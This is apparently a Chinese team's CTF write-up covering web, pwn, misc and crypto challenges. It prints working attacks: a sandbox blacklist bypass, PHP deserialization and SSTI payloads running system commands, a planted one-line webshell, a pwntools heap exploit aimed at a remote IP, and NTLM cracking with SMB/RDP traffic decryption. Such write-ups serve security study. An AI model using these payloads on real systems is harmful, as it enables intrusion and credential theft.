战队名称: ZeroPointZero
战队排名:63名
PART.01
操作内容:
下载附件审计源码
遍历黑名单进行判断
处理传过来的模块数据
处理json格式下的数据为python的代码
处理json格式下的数据为python的代码
执行处理出来的代码加入到hook_code内:
根路由
利用思路:
通过模块传入恶意code,在通过拼接到hook_code下执行。
利用条件:
1.遍历时绕过test模块check_for_blacklisted_symbols,并发现else逻辑下有unidecode.unidecode解码text下的内容,
结合动调发现全角符合直接可以绕过黑名单
成功绕过黑名单。
2.绕过好后的代码将拼接到hook_code下,但是我们的代码是event_name传入且,len判断长度是否大于4,这个是需要绕过,绕过思路是len函数是 builtins 模块,这个模块包含了所有 Python 的内置函数,包括 len。先通过__import__(“builtins”)导入并通过 .len = lambda qwe: 1 将 len 重新赋值为一个新的匿名函数(lambda 表达式),该函数接受一个参数qwe,但不论传入什么参数,始终返回 1。
查阅文章得到:
发现直接修改了len函数的返回值。
成功绕过大于4的条件
1.通过cat去读取文件,cat /flag ,使用八进制和$()linux内联执行代码,发现cat无法读取,不知道为啥,就换了个dd ,dd if=/flag,如下
本地动调执行:
通过网址:
在线全角半角转换
https://www./string/full-half-width-converter
成功绕过黑名单:
进入unidecode.unidecode函数逻辑,并处理是数据,
成功正确拿到恶意code,并返回恶意code。
并拼接到空字符的python_code下
并进入do函数下:进行拼接得到
然后将my_audit_hook的代码写入run.py文件下python执行:
并返回结果。
本地动调成功绕过且执行
flag值:
flag{7c1a4fe8981e295a785a49146340b9}
目录扫描发现源码http://eci-2zeikei7c3gbm1zmc0w4.cloudeci1./www.zip
发现class.php一个类文件 一眼丁真反序列化考点 查看class类文件发现
这一块是替换字符串 在SessionManager类中 会对session文件进行操作
这里会替换session文件内容操作
查看index.php文件,这个地方有调用类操作(session中存储了随机的key,走username逃逸有点 不可控)
选用password处传数组进行反序列化逃逸 简单的exp:其实可以数出来
';i:1;s:74:' 12 passthrueval {i:0;s:6:'123456';i:1;s:3:'123';} ';i:1;s:3:'123';}t|O:15:'notouchitsclass':1:{s:4:'data';s:20:'syssystemtem('/readflag');';}system双写绕过替换
<?phpclass notouchitsclass{public $data = 'syssystemtem('/readflag');';}echo serialize(new notouchitsclass());
修改序列化数据长度
Flag 值
flag{d572d3d9-84d7-4428-b0a7-4bb0a07bf246}
初始化赛题环境:
github下载了一份源码进行判断
审视一圈nday没发现啥,于是想从源码下手发现一个很可疑点
发现Admins类下只是继承方法并位调用initialize鉴权文件的位置,于是猜想可能存在未授权访问后台,访问/admin/admins/成功进入后台
直接翻翻翻到支付管理下的支付设置是一个web页面修改php文件,那不就来拉,直接插入一句话木马。发现很不一样,因为他的代码中有return,于是我直接全部删除,插入一句话:
并保存刷新
Flag值
Flag{e6f9ee8b-483a-9eae-62b7deda41dd}
下载附件审计源码:
定义一个请求结构体负责数据json
/v1/api/flag 执行flag返回为json
检测url的绝对路径
构造上面的结构体请求
直接访问的话403,在根据题意proxy且代码
/v2/api/proxy将这个结构体转化为新的请求,就可以出现ssrf漏洞:
使用hackbar访问
flag{43f4a8ab-9bf0-4598-bd65-a169dcb0620f}
PART.05
WEB4-snake
分析后端返回json,发现是一个二维的数组贪吃蛇小游戏,可以通过脚本去模拟绘制后端蛇和食物与墙壁的位置:
代码:
import timeimport requestsimport jsonapi_url = 'url/move' #urlhttp_headers = {'Cookie': 'session=' #session}request_payload = {'direction': 'RIGHT'}proxy = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080'}def safe_path(snake_segments, target_position):return target_position not in snake_segmentsdef bounds(target_position):if target_position[0] > 19 or target_position[0] < 0 or target_position[1] > 19 or target_position[1] < 0:return Falsereturn Truegame_state = ''while True:try:game_state = requests.post(api_url, json=request_payload,proxies=proxy)game_state = game_state.json()print(game_state)snake_ld = game_state['snake'][0]target_food = game_state['food']move_dir = ''if target_food[0] > snake_ld[0] and safe_path(game_state['snake'],[snake_ld[0] + 1, snake_ld[1]]) and bounds([snake_ld[0] + 1, snake_ld[1]]):move_dir = 'RIGHT'elif target_food[0] < snake_ld[0] and safe_path(game_state['snake'], [snake_ld[0] - 1,snake_ld[1]]) and bounds([snake_ld[0] - 1, snake_ld[1]]):move_dir = 'LEFT'elif target_food[1] > snake_ld[1] and safe_path(game_state['snake'], [snake_ld[0],snake_ld[1] + 1]) and bounds([snake_ld[0], snake_ld[1] + 1]):move_dir = 'DOWN'elif target_food[1] < snake_ld[1] and safe_path(game_state['snake'], [snake_ld[0],snake_ld[1] - 1]) and bounds([snake_ld[0], snake_ld[1] - 1]):move_dir = 'UP'elif safe_path(game_state['snake'], [snake_ld[0] + 1, snake_ld[1]]) and bounds([snake_ld[0] + 1, snake_ld[1]]):move_dir = 'RIGHT'elif safe_path(game_state['snake'], [snake_ld[0] - 1, snake_ld[1]]) and bounds([snake_ld[0] - 1, snake_ld[1]]):move_dir = 'LEFT'elif safe_path(game_state['snake'], [snake_ld[0], snake_ld[1] + 1]) and bounds([snake_ld[0], snake_ld[1] + 1]):move_dir = 'DOWN'elif safe_path(game_state['snake'], [snake_ld[0], snake_ld[1] - 1]) and bounds([snake_ld[0], snake_ld[1] - 1]):move_dir = 'UP'if move_dir == '':continuerequest_payload = {'direction': move_dir}print(request_payload)except Exception as err:pass 在burp在查看分数,分数40左右会发现目录:/snake_win
并进行了sql注入翻烂了数据库内(只有一个sqlite_sequence和users表)的东西都没看见flag
后面转化思路将问题定位了一下user下的username好像是我们一开始输入的值,
并查询users表下的username发现确实执行ssti模板注入,
并将网上获取的payload放入
{{lipsum.__globals__['__builtins__']['eval']('__import__('os').popen('whoami').read()')}}尝试在username地方输入'{{}}“”等字符发现页面报错500发现是python框架在snake_win路由发现可以执行sql语句
在之前团队内分享案例中有相似案例直接sql语句+ssti getshell
WEB7-gamepassword
注册游戏用户为xxx
然后开始在密码的地方游戏
拿下第二关
获取,打通关就好,获取到源码
获取到了
到这一步他满足那个r2了,然后算加法41233
password=O:4:'root':3: {s:8:'username';s:3:'xxx';s:5:'value';i:2024;s:2:'kk';O:4:'user':3: {s:8:'username';R:3;s:8:'password';N;s:5:'value';s:5:'99933';}}96 exp
<?phpclass root {public $username;public $value;public $kk;}class user {public $username;public $password;public $value;}// 创建 root 和 user 对象$root = new root();$root->username = 'xxx';$root->value = 2024;// 创建 user 对象$user = new user();$user->username = &$root->username; // 引用 root 对象中的 username$user->password = null;$user->value = '99933';$root->kk = $user;// 序列化对象$serializedData = serialize($root);echo $serializedData;?>
Flag 值:
flag{f9ebc0ee-ca8c-4c47-a0e6-8b020ad9b88b}
PWN5 baby_heap
largebin范围的堆,不用填充tcachebin,最多同时用5个堆
free有uaf
show不会被截断,可以同时泄露出libc_base和heap_base,但是后面也没用上
print_env里有getenv,getenv又是用的strncmp实现的
所以把strncmp的got表改成puts就行
from pwn import *from pwncli import *from struct import packfrom ctypes import *elf_name = './baby_heap'# io = process(elf_name)io = remote('39.106.54.211', 26641)# context(os='linux', arch='amd64')# context(os='linux', arch='amd64', log_level='debug')elf = ELF(elf_name)libc = ELF('./libc-2.35.so')# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')# libc = ELF('/home/yukon/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6') # ctfshow用的ubuntu18.04lg_infos = []lga = lambda data: lg_infos.append(data)s = lambda data: io.send(data)sl = lambda data: io.sendline(data)sa = lambda text, data: io.sendafter(text, data)sla = lambda text, data: io.sendlineafter(text, data)r = lambda n: io.recv(n)ru = lambda text: io.recvuntil(text)rl = lambda: io.recvline()int16 = lambda a: int(a, 16)strencode = lambda a: str(a).encode()uu32 = lambda: u32(io.recvuntil(b'xf7')[-4:].ljust(4, b'x00'))uu64 = lambda: u64(io.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))iuu32 = lambda: int(io.recv(10), 16)iuu64 = lambda: int(io.recv(6), 16)uheap = lambda: u64(io.recv(6).ljust(8, b'x00'))# lg = lambda addr: log.success(addr)# lg = lambda addr: log.info(addr)lg = lambda data : io.success('%s -> 0x%x' % (data, eval(str(data))))ia = lambda: io.interactive()def log_all():for lg_info in lg_infos:lg(lg_info)def attach(io, gdbscript=''):log_all()gdb.attach(io, gdbscript)def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))def get_IO_str_jumps():IO_file_jumps_offset = libc.sym['_IO_file_jumps']IO_str_underflow_offset = libc.sym['_IO_str_underflow']for ref_offset in libc.search(p64(IO_str_underflow_offset)):possible_IO_str_jumps_offset = ref_offset - 0x20if possible_IO_str_jumps_offset > IO_file_jumps_offset:print(possible_IO_str_jumps_offset)return possible_IO_str_jumps_offsetmenu = b'Enter your choice: n'def add(size):sla(menu, b'1')sla(b'Enter your commodity size n', strencode(size))def delete(idx):sla(menu, b'2')sla(b'Enter which to delete: n', strencode(idx))def edit(idx, content):sla(menu, b'3')sla(b'Enter which to edit: n', strencode(idx))sla(b'Input the content n', content)def show(idx):sla(menu, b'4')sla(b'Enter which to show: n', strencode(idx))def g():gdb_sript = '''set debug-file-directory /home/yukon/glibc-all-in-one/libs/2.35-0ubuntu3.7_amd64/.debugnfile %snsharedlibrarynfilensharedlibraryntele $rebase(0x5070) 1ntele $rebase(0x5080) 5ntele $rebase(0x50e0) 5n''' % elf_name# gdb.attach(io)# gdb.attach(io, 'b printf')gdb.attach(io, gdb_sript)log_all()add(0x500)add(0x10)delete(1)show(1)libc_base_addr = uu64() - 0x21ace0strncmp_got = libc_base_addr + 0x00000000021A118sla(': ', '0')s(p64(strncmp_got))s(p64(libc_base_addr+libc.symbols['printf']))sla(b': ', b'5')sl(b'2')ru(b'FLAG')print('FLAG:------------------------------', end='')print(rl())# delete(2)# g()ia()# io.recvuntil('(.*?)')# io.recvuntil(b'$1')# io.sendline(str((.*?)))# io.sendline(str($1).encode())flag{cfdc2518-0b1e-4df3-a781-7bef484b7c37}
Misc1-pickle_jail
下载附件,查看py文件,服务器端的代码,发现是个jail,使用了 pickle 模块来序列化和反序列化数据,将用户的名字、玩家名单和flag序列化到一个 BytesIO 对象中。将序列化后的数据转换为字节数组。修改数据让用户输入一个随机数,然后修改字节数组中相应位置的值
根据规则写出爆破EXP,进行逐字节爆破
from pwn import *import structimport reip = ''port =CHARACTER_SET = '0123456789abcdef-'CURRENT_FLAG = 'flag{'def establish_connection():return remote(ip, port)def retrieve_player_count(connection):'''从服务中检索玩家数量'''players_info = connection.recvuntil(b'What's your name?n')player_data = re.findall(b'[(.*)]', players_info)return 289 - (len(player_data[0]) - 248) if player_data else 289def construct_payload(attempted_flag, player_count):'''构造payload'''name_length = struct.pack('<I', len(attempted_flag))if b'n' in name_length:attempted_flag = attempted_flag[1:]name_length = struct.pack('<I', len(attempted_flag))padding_length = struct.pack('<I', 600 - len(attempted_flag) - player_count)prefix = b'Bx7fx00x00x00'suffix = b'(B' + name_length + attempted_flag.encode() + b'B' + padding_lengthpayload = prefix + b'x00' * 127 + suffix + b'x00' * (254 - len(prefix) - 127 - len(suffix))return payloaddef verify_flag_response(response, attempted_flag):'''验证响应中是否包含尝试的flag'''if attempted_flag.encode() in response:if attempted_flag[0] != 'f':return 'f' + attempted_flagelse:return attempted_flagreturn Nonedef main():while True:for char in CHARACTER_SET:with establish_connection() as conn:player_count = retrieve_player_count(conn)attempted_flag = CURRENT_FLAG + charprint(f'Attempting flag: {attempted_flag}')payload = construct_payload(attempted_flag, player_count)conn.sendline(payload)conn.recvuntil(b'Enter a random number to win: n')conn.sendline(b'x0c')response = conn.recvline()print(f'Server response: {response}')updated_flag = verify_flag_response(response, attempted_flag)if updated_flag:CURRENT_FLAG = updated_flagprint(f'Updated flag: {CURRENT_FLAG}')breakif __name__ == '__main__':main()
爆破到最后,会发现最后一位会无限重复,无法停止,证明字典里没有对应的值,说明这里应该是},最后提交flag
Flag值
flag{9856e5e7-2703-47f4-8328-e6761a40834d}
PART.02
骗他就行了
第一张:
去过,青海湖,在岸边用百度全景走一圈就有
在这个位置
第二张:
百度搜,在上海
第三张:
根据这个和塔台定位到双流机场
第五张:
点击就送,重庆轻轨
第六张:
根据这个找到南京大报恩寺琉璃塔
第七张:
通过GPT分析:
选择长沙看图很容易发现在桥上且桥下有岛
一个一个的将长沙的环城桥点开看最后定位在橘子洲
第八张:
百度地图搜上海隧桥,一眼丁真
原来左边平地是海吗
第九张:
看着像安庆的长江大桥,但是护栏是蓝色的,百度搜长江大桥
没有全景,试了几个桥对了, 不记得是不是沌口了
第十张:
浙江,找到这个,中铁三局,
找了几个比较密集的高铁,最终在杭州找到
Flag值:
flag{b686da73592624ad0f92633fcab6ec0e}
MISC8-谍影重重5.0:
分析会话A:00:0c:29:67:dc:36 B:00:50:56:f2:25:de,这俩在互相通信
发现这里有个SMB2后面有个User,细看,
使用该id和key对smb解密
没啥变化,未解密成功,上网搜资料
尝试这个
构造hashcat格式
只有tom是登录成功的,
故为
tom::.:c1dec53240124487:ca32f9b5b48c04ccfa96f35213d63d75:010100000000000040d0731fb92adb01221434d6e24970170000000002001e004400450053004b0054004f0050002d004a0030004500450039004d00520001001e004400450053004b0054004f0050002d004a0030004500450039004d00520004001e004400450053004b0054004f0050002d004a0030004500450039004d00520003001e004400450053004b0054004f0050002d004a0030004500450039004d0052000700080040d0731fb92adb0106000400020000000800300030000000000000000100000000200000bd69d88e01f6425e6c1d7f796d55f11bd4bdcb27c845c6ebfac35b8a3acc42c20a001000000000000000000000000000000000000900260063006900660073002f003100370032002e00310036002e003100300035002e003100320039000000000000000000使用john爆破哈希
接下来根据得到的密码计算smb随机密钥(使用上面的文章里面的py脚本)
import hashlibimport hmacimport argparse#stolen from impacket. Thank you all for your wonderful contributions to the community# try:from Cryptodome.Cipher import ARC4from Cryptodome.Cipher import DESfrom Cryptodome.Hash import MD4# except Exception:# LOG.critical('Warning: You don't have any crypto installed. You need pycryptodomex')# LOG.critical('See https:///project/pycryptodomex/')def generateEncryptedSessionKey(keyExchangeKey, exportedSessionKey):cipher = ARC4.new(keyExchangeKey)cipher_encrypt = cipher.encryptsessionKey = cipher_encrypt(exportedSessionKey)return sessionKey###parser = argparse.ArgumentParser(description='Calculate the Random Session Key based on data from a PCAP (maybe).')parser.add_argument('-u','--user',required=True,help='User name')parser.add_argument('-d','--domain',required=True, help='Domain name')parser.add_argument('-p','--password',required=True,help='Password of User')parser.add_argument('-n','--ntproofstr',required=True,help='NTProofStr. This can be found in PCAP (provide Hex Stream)')parser.add_argument('-k','--key',required=True,help='Encrypted Session Key. This can be found in PCAP (provide Hex Stream)')parser.add_argument('-v', '--verbose', action='store_true', help='increase output verbosity')args = parser.parse_args()#Upper Case User and Domainuser = str(args.user).upper().encode('utf-16le')domain = str(args.domain).upper().encode('utf-16le')#Create 'NTLM' Hash of passwordpassw = args.password.encode('utf-16le')hash1 = hashlib.new('md4', passw)password = hash1.digest()#Calculate the ResponseNTKeyh = hmac.new(password, digestmod=hashlib.md5)h.update(user+domain)respNTKey = h.digest()#Use NTProofSTR and ResponseNTKey to calculate Key Excahnge KeyNTproofStr = args.ntproofstr.decode('hex')h = hmac.new(respNTKey, digestmod=hashlib.md5)h.update(NTproofStr)KeyExchKey = h.digest()#Calculate the Random Session Key by decrypting Encrypted Session Key with Key Exchange Key via RC4RsessKey = generateEncryptedSessionKey(KeyExchKey,args.key.decode('hex'))if args.verbose:print 'USER WORK: ' + user + '' + domainprint 'PASS HASH: ' + password.encode('hex')print 'RESP NT: ' + respNTKey.encode('hex')print 'NT PROOF: ' + NTproofStr.encode('hex')print 'KeyExKey: ' + KeyExchKey.encode('hex')print 'Random SK: ' + RsessKey.encode('hex')
NTProofSTR和keypython calc.hash.py --user tom --domain . --password babygirl233 --ntproofstr ca32f9b5b48c04ccfa96f35213d63d75 --key 5643a37f253b00b2f52df1afd48c1514得到sessionkey
解密smb2,
导出smb对象,发现一个压缩包
压缩包需要密码
发现流量包除了压缩包还有 rdp 的流量
搜索发现
导出证书 pfx,证书是mimikatz 导出的,密码是 mimikatz
openssl pkcs12 -in 2.pfx -nocerts -out server_key.pem -nodesopenssl rsa -in server_key.pem -out server.key
发现rdp流量已经是明文了,过滤一下
还原rdp流量
用pyrdp-player播放还原出的视频,观察下面的键盘输入
the 7z password is f'{windows_password}9347013182′
将Windows密码替换进去,得到7z解压密码babygirl2339347013182
就是压缩包的密码
Flag值:
flag{fa32a0b2-dc26-41f9-a5cc-1a48ca7b2ddd}
操作内容:
分析脚本
输入与正则表达式匹配:程序接受一个命令,使用正则表达式
pattern =
r'([AB]|d+)=([AB]|d+)(+|-|*|//|<<|>>|&|^|%)
([AB]|d+)’ 来判断命令的格式,要求为 X=Y OP Z 的形式。
操作步骤限制:程序设置了一个操作步骤的限制,总共为21次,初始计数器为21。
汉明重量计算:定义了一个函数 w,用于计算输入值的汉明重量,即二进制表示中1的个数。
随机生成值与计数:程序会随机生成100个不同的A指值(128位整数),并进行计算。如果计数器 success 的值达到100,就会触发一个标志(flag)。
位运算操作:在计算过程中,需要按位进行与运算、右移和累加,以调整A的值。
故exp:
B=A>>1;B=B&113427455640312821154458202477256070485;A=A-B;B=A&68056473384187692692674921486353642291;A=A>>2;A=A&68056473384187692692674921486353642291;A=A+B;B=A>>4;A=A+B;A=A&20016609818878733144904388672456953615;B=A>>8;A=A+B;B=A>>16;A=A+B;B=A>>32;A=A+B;B=A>>64;A=A+B;A=A&1Flag{you_can_weight_it_in_21_steps!}
操作内容:
网上有道类似的题目:
huwangbei2019_Crypto1 – f61d
套用链接的EXP,nc的到需要的值,把需要的值填进去,跑脚本,等待一会儿即可
#encoding:utf-8from Crypto.Util.number import bytes_to_long, long_to_bytesfrom gmpy2 import mpz, iroot, powmod, invert# N = pq 2050bit; p 1025 bit; q 1025 bitN = mpz('')# g 500bit; is p-1 and q-1 prime factor# p = 2*g*a + 1; q = 2*g*b + 1g = mpz('')e = 65537C = mpz('')# Calculate h, u, and vh = (N - 1) // gu = h // gv = h % gdef Solve_c(start_r=5100,start_s=2000):# Calculate approximate square root of Nsqrt_N = iroot(mpz(N), 2)[0]C_approx = sqrt_N // (g * g) # 确保结果为整数a = 2b = powmod(a, g, N)# Loop over possible values of Cfor i in range(2, int(C_approx) + 1): # 使用 int() 将 C_approx 转换为整数D = (iroot(C_approx, 2)[0] + 1) * ifinal = powmod(b, u, N)for r in range(5100,int(D)):print(f'Checking r*D for i={i}: {r * D}')for s in range(2000,int(D)):if powmod(b, r * D + s, N) == final:print('Solution found: r =', r, 's =', s, 'i =', i)return r * D + s# Get the value of cc = Solve_c()print('c:', c) # Expected output: c = 51589121
操作内容:
part1给了p+q。
phi = (p-1)*(q-1)
= p*q – (p+q) + 1
= n – (p+q) + 1
简单的rsa
part2发现有相似题的wp
apbq-rsa-ii – DUCTF 2023 – Connor M (connor-mccartney.github.io)
part3用2的d就能解出来
EXP
from Crypto.Util.number importfrom gmpy2 importfrom sympy import Matrix
from itertools import*hints =18978581186415161964839647137704633944599150543420658500585655372831779670338724440572792208984183863860898382564328183868786589851370156024615630835636170n1,e1 =(89839084450618055007900277736741312641844770591346432583302975236097465068572445589385798822593889266430563039645335037061240101688433078717811590377686465973797658355984717210228739793741484666628342039127345855467748247485016133560729063901396973783754780048949709195334690395217112330585431653872523325589,65537)enc1 =23664702267463524872340419776983638860234156620934868573173546937679196743146691156369928738109129704387312263842088573122121751421709842579634121187349747424486233111885687289480494785285701709040663052248336541918235910988178207506008430080621354232140617853327942136965075461701008744432418773880574136247
phi1=n1-hints+1
d1 = inverse(e1, phi1)m1 =pow(enc1,d1,n1)flag1 = long_to_bytes(m1).decode()
hints =[18167664006612887319059224902765270796893002676833140278828762753019422055112981842474960489363321381703961075777458001649580900014422118323835566872616431879801196022002065870575408411392402196289546586784096,16949724497872153018185454805056817009306460834363366674503445555601166063612534131218872220623085757598803471712484993846679917940676468400619280027766392891909311628455506176580754986432394780968152799110962,17047826385266266053284093678595321710571075374778544212380847321745757838236659172906205102740667602435787521984776486971187349204170431714654733175622835939702945991530565925393793706654282009524471957119991,25276634064427324410040718861523090738559926416024529567298785602258493027431468948039474136925591721164931318119534505838854361600391921633689344957912535216611716210525197658061038020595741600369400188538567,22620929075309280405649238349357640303875210864208854217420509497788451366132889431240039164552611575528102978024292550959541449720371571757925105918051653777519219003404406299551822163574899163183356787743543,20448555271367430173134759139565874060609709363893002188062221232670423900235907879442989619050874172750997684986786991784813276571714171675161047891339083833557999542955021257408958367084435326315450518847393,16581432595661532600201978812720360650490725084571756108685801024225869509874266586101665454995626158761371202939602347462284734479523136008114543823450831433459621095011515966186441038409512845483898182330730,23279853842002415904374433039119754653403309015190065311714877060259027498282160545851169991611095505190810819508498176947439317796919177899445232931519714386295909988604042659419915482267542524373950892662544,16542280976863346138933938786694562410542429842169310231909671810291444369775133082891329676227328401108505520149711555594236523078258701726652736438397249153484528439336008442771240980575141952222517324476607,17054798687400834881313828738161453727952686763495185341649729764826734928113560289710721893874591843482763545781022050238655346441049269145400183941816006501187555169759754496609909352066732267489240733143973,22115728663051324710538517987151446287208882441569930705944807337542411196476967586630373946539021184108542887796299661200933395031919501574357288914028686562763621166172668808524981253976089963176915686295217,19324745002425971121820837859939938858204545496254632010818159347041222757835937867307372949986924646040179923481350854019113237172710522847771842257888083088958980783122775860443475680302294211764812636993025,17269103712436870749511150569030640471982622900104490728908671745662264368118790999669887094371008536628103283985205839448583011077421205589315164079023370873380480423797655480624151812894997816254147210406492,17365467616785968410717969747207581822018195905573214322728668902230086291926193228235744513285718494565736538060677324971757810325341657627830082292794517994668597521842723473167615388674219621483061095351780,20823988964903136690545608569993429386847299285019716840662662829134516039366335014168034963190410379384987535117127797097185441870894097973310130525700344822429616024795354496158261293140438037100429185280939,19068742071797863698141529586788871165176403351706021832743114499444358327620104563127248492878047796963678668578417711317317649158855864613197342671267006688211460724339403654215571839421451060657330746917459,20089639597210347757891251257684515181178224404350699015820324544431016085980542703447257134320668961280907495580251880177990935443438799776252979843969984270461013888122703933975001704404129130156833542263882,22344734326131457204500487243249860924828673944521980798994250859372628295695660076289343998351448667548250129358262592043131205967592613289260998148991388190917863322690137458448696392344738292233285437662495,22688858027824961235755458925538246922604928658660170686458395195714455094516952026243659139809095639584746977271909644938258445835519951859659822660413616465736923822988993362023001205350387354001389518742538,21286046487289796335501643195437352334100195831127922478044197411293510360710188581314023052580692810484251118253550837525637065385439859631494533102244585493243972819369812352385425700028640641292410326514111,21542729548465815605357067072323013570796657575603676418485975214641398139843537820643982914302122976789859817102498484496409546012119998359943274203338400776158986205776474024356567247508744784200354385060666,22319592382753357951626314613193901130171847776829835028715915533809475362288873045184870972146269975570664009921662023590318988850871708674240304838922536028975978222603171333743353770676344328056539379240160,25195209191944761648246874631038407055240893204894145709996399690807569652160721616011712739214434932639646688187304865397816188999592774874989401871300784534538762135830014255425391132306536883804201055992313,18257804244956449160916107602212089869395886846990320452133193087611626919926796845263727422042179229606817439442521540784268169177331707314788427670112999551683927934427716554137597798283300120796277229509678,20293403064916574136692432190836928681820834973375054705153628740577159076332283715581047503287766236543327123639746352358718218140738999496451259789097826888955418315455420948960832865750253988992454128969953,15967654820584966012628708475666706277218484919923639492431538068059543232562431059752700377242326527417238151501168940191488179144049286512652111172149113549072003881460743035279388672984805823560897688895124,25144187979876039024245879200325843092774389926620026124061775431569974232758799200333888039013494603721065709195353330350750055309315207499741437181094874894647736904055829877859906318073991986020178158776286,15736932921640444103019961538951409924080453868073105830403926861058056351553271238438325117113945341892868641345117717666354739204401152657265824568724844930574396801692131746182948347887298330990039956813130,18831072673439732764722762485733622234889447953507582396819704359771208236721692820362137219509611319088756045211407777880521726782697895768017460064889670066178710804124631128581556314122255564861269062385337,23800437561684813552661749774840752013501533683948618798811470214669024646396165487093720960221009038817909066075238937189371227098032581450466402462014437421254375846263830927945343485988463525070074913720710,24402191070622494792723290726249952159888270689258801831518209605331984684494095167423722682814769395395011136124403802097229547003802312444913008194461779426175966774202219703164060353710247619639616444797670,20215481513831963554421686543560596857659844027486522940060791775984622049024173363533378455076109165728144576719015392033536498353094895564917644840994662704362121549525329105205514332808950206092190939931448,18384453917605955747212560280232547481041600196031285084598132475801990710125754705645482436436531608696373462641765399622296314590071558616193035939108523357020287896879479452040171765916716377102454266933226,21890401344164908103930010123434944359446535642544335610455613014563290097498740447164765588532234051104173227090428486681237432196639010849051113283297943367655458678533223039415083212229970648958070799280218,18379893441293694747570620009241814202936873442370354246029979042247705730610190888710981918183390028386451290137755339890329474403224043675724851314770861939082447728194632548864823398818221526652331319263027,18715827130228986951360013590464775001019026913384718876134449689773600060962392738619405370033085704046027397895627933844824630723286144367800484157574548819065406118338665931032779491897783504790669824301288,13588739911708699123450670852772302012518315143187739886523841133752009403411431627334135210166268158490674049617489193734568451811305631563767138879895461211915128972052001136464325219117009268526575020143259,18506039912943821193373920483847347155611306173368341979655092778147169768984477236224526786441466933360500418090210912574990962709452725122792963919616633389125605160796446674502416801964271004625701238202575,22167985517547342184812919437069844889650448522260359154086923601900060998572245598167213217022051141570075284051615276464952346620430587694188548679895095556459804921016744713098882496174497693878187665372865,21507363933875318987283059841465034113263466805329282129011688531718330888226928182985538861888698160675575993935166249701145994333840516459683763957425287811252135418288516497258724668090570720893589001392220,20250321586608105267884665929443511322540360475552916143405651419034772061789298150974629817817611591100450468070842373341756704300393352252725859102426665187194754280129749402796746118608937061141768301995522,16104259151024766025645778755951638093681273234415510444173981198301666343334808614748361662637508091511498829253677167171091582942780017355912433497214576425697459483727777273045993446283721290714044600814203,14560242181138184594433372530956542527312169507277535425067427080573272033961044062335960097446781943943464713852520415535775461964590009720592053626735276833191667395201287169782350381649400286337671320581068,16239347596615402699390026749150381714807445218767496868569282767673828662340774349530405347667558555781433774705139593469838946201218537641296949822639509296966092138954685186059819628696340121356660166937131,21344472317634795288252811327141546596291633424850284492351783921599290478005814133560171828086405152298309169077585647189366292823613547973428250604674234857289341613448177246451956695700417432794886277704716,16053809990112020217624905718566971288375815646771826941011489252522755953750669513046736360397030033178139614200701025268874379439106827823605937814395162011464610496629969260310816473733828751702925621950679,18917855883623050190154989683327838135081813638430345099892537186954876489710857473326920009412778140451855952622686635694323466827034373114657023892484639238914593012175120540210780102536003758794571846502397,22690171278715056779052233972642657173540399024770527983659216197108042021644328773010698851143953503599329885607621773816718008861742027388432534850163666629476315340137626681994316866368449548292328156728206,21087818524872480052313215092436868441694786060866149491087132591272640372512484925209820065536439188250579925233059144898601140234767300574307770064543499923712729705795392684173268461519802573563186764326797,18439753470094841291394543396785250736332596497190578058698960152415339036714664835925822942784700917586270640813663002161425694392259981974491535370706560550540525510875465091384383255081297963169390777475352,20105719699015744146039374208926740159952318391171137544887868739518535254000803811729763681262304539724253518465850883904308979964535242371235415049403280585133993732946919550180260852767289669076362115454200,17251599484976651171587511011045311555402088003441531674726612079301412643514474016351608797610153172169183504289799345382527665445027976807805594288914226822374523878290416047130731166794970645275146679838899,23027331991437585896233907022469624030630702237261170259290872847355304456043379238362120518409085840638396736666056992747627271193089116095167049248270541979716594671069985183070290375121270398623215587207529,18158149685496169798299129683009221264185608469410295069411669832919646968324946121757411511373498747604679198739125835462814352243797919744572086307939585501566092705355693015625009717017077302201663788208609,18276153196656501517216055049560959047263892309902154534799806637704337317207294332426798932144785240877892837491213916540255237702169595754963908689566362060228840286531616263506272071630209104758589482803348,19830654702835464289082520892939657653574451119898587213320188332842291005863699764597454403874285715252681820027919359194554863299385911740908952649966617784376852963552276558475217168696695867402522508290055,15349828226638644963106414986240676364822261975534684137183044733508521003843559094515387144949811552173241406076270015291925943459603622043168219534080772937297911323165839870364550841685270125556125756627553,20923687596111161976478930953796496927811701530608223491138786355445002217973253897724452954815797952200740069102515860924306246841340715110620719064010080520601890251137419840158983682372232110885549732743013,21095748006022412831703352650023882351218414866517568822818298949510471554885207645049385966827210564667371665855668707424105040599599901165292360321667007968065708796593851653085339928947755081203265281357013,20136320433636422315432754195821125224777716034031656342233368000257459497472596860252592531939146543685406198978058242599116859263546329669263543660114747385041549283367183026001454445297981439938401547228229,16496919752274418275948572022974868132658743151124597724312835413857298109100258912203517423633396955060591787380445877361136405137884456764770035346437177846666365911942996404514058688909577420388537479730705,13788728438272498164727737074811797093818033799836159894472736480763530670013682288670889124484670336660448907074673625466218166413315342420667608074179975422284472184048790475129281850298519112884101776426380,24852871485448795332267345793743281093931161235481251209948049584749441451621572752080662697610253315331335180611651946374137068256112152253681972406000252076016099200912670370417045090034045383991812756120791,18663346319122078996775762643035864683521213720864038756854558668694021987970601131985163948257100423991091156649638455828855082098689641225427227191064496066436196910238564311309556938903101074363279783438714,21400068681031931459396470039651524575262457489792894764406364952394476440804779651233022862527636114968325782197380721095406628084183336358459476006267416033892771932528688312375109463803215034905281657962293,16044158155847172030103761204572942507195578382208455423846603003318483484698088948486132040995746837257705704187725306831142305215342467016564452582165866039427184607605673304595194959499145031211096109534167,16518253246325822837502418827700493807621067058438396395472266350036385535241769917459657069911028720968654253735107131282350340465691670072304718987805883113410923109703284511709226857412404454224134480632696,22032469066601123287586507039704080058983969235246539501189720236880312024198451198788699002335010120658564926677243708367430773661097221076615953342733896063909953602379936312639192315223258556134958059637605,17474611942177808070315948910226643697957069578572244709354155010512694059987765040746148981545760660371360975936526076852619987733316042847813177383519241505024635332293992920023420060610648140841369822739716,20097265939024591617239874622716452182434300498447992668997438018575636772416262543204370899462096267444545094719202447520254303983442269757551626971917981420832391886214473318353984504467919530676605744560570,18170251482705061226968041449812078923477452841162650888922564215790088545936753453513162197661916172215859504545409274440450807677845894292177296835154674774694992388033874349807244020099167681146357128785394,18084007437523118129421476751918491055914528331902780911288404344016551650138679157754567938593688369062981279371320169939281882307797009116458871503759873023914718337944953764426183937635379280572434676575757,17001811604221128900675671565539617923973183364469396458234914432162